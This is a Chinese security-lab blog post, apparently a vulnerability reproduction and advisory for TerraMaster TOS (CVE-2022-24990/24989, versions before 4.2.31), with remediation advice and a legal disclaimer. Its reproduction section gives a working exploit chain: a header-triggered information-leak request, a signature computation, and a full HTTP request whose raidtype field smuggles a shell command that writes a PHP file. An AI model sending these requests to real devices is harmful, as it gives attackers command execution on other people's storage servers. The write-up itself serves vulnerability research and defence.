咨询服务热线

400-6446-808

创安实验室专栏
您的当前位置:首页 > 创安实验室专栏
创安实验室专栏丨TerraMaster TOS 信息泄漏到命令执行
发布者:创信华通  发布时间:2022-12-21  浏览量:254次











古语有云:“学如逆水行舟,不进则退。”面对如今随时都在变化的网络安全环境更是如此。为此,创信华通微信公众号特开设“创安实验室专栏”,以记录创信华通创安实验室在技术上的探索,加强同行间的交流,相互学习,共同进步。


+

+

TerraMaster TOS 信息泄漏到命令执行

漏洞描述

TerraMaster TOS 存在信息泄漏漏洞,攻击者通过漏洞可以获取服务器上的敏感信息,配合 CVE-2022-24989漏洞可以获取服务器权限

影响范围

TerraMaster TOS < 4.2.31

漏洞编号

CVE-2022-24990、CVE-2022-24989

漏洞等级

严重

漏洞复现

目前外界Exp/PoC已公开,创安实验室已验证该漏洞的可利用性:

数据包中只需要添加 User-Agent: TNAS, 可以访问到敏感信息

poc: /module/api.php?mobile/webNasIPS

利用信息泄露的 PWD和mac地址,我们就可以利用这个命令执行漏洞了

在发送请求包写入 php恶意文件

其中md5(mac地址后三字节 + 当前时间戳) = $_SERVER['HTTP_SIGNATURE']

POST /module/api.php?mobile/createRaid HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

Authorization: PWD

Cache-Control: max-age=0

Content-Length: 82

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=; tos_visit_time=时间戳

Signature: sign

Timestamp: 时间戳

Upgrade-Insecure-Requests: 1

User-Agent: TNAS

 

raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Evuln1.php&diskstring=XXXX


这里利用https://github.com/lishang520/CVE-2022-24990进行一键获取和上传

修复建议

升级到安全版本


E·N·D


本文由创信华通创安实验室编辑。

本文仅限于个人学习和技术研究,由于传播、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者本人负责,本单位不为此承担任何责任。创安攻防实验室拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。


如有侵权,请联系后台。




创安实验室

创信华通创安实验室,是成都创信华通信息技术有限公司旗下的技术研究团队,成立于2021年9月,主要研究红蓝对抗、重大安全保障、应急响应等方向。

创安攻防实验室圆满完成了多次公安举办的重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。

创安攻防实验室秉承创信华通的发展理念,致力打造国内一流网络安全团队。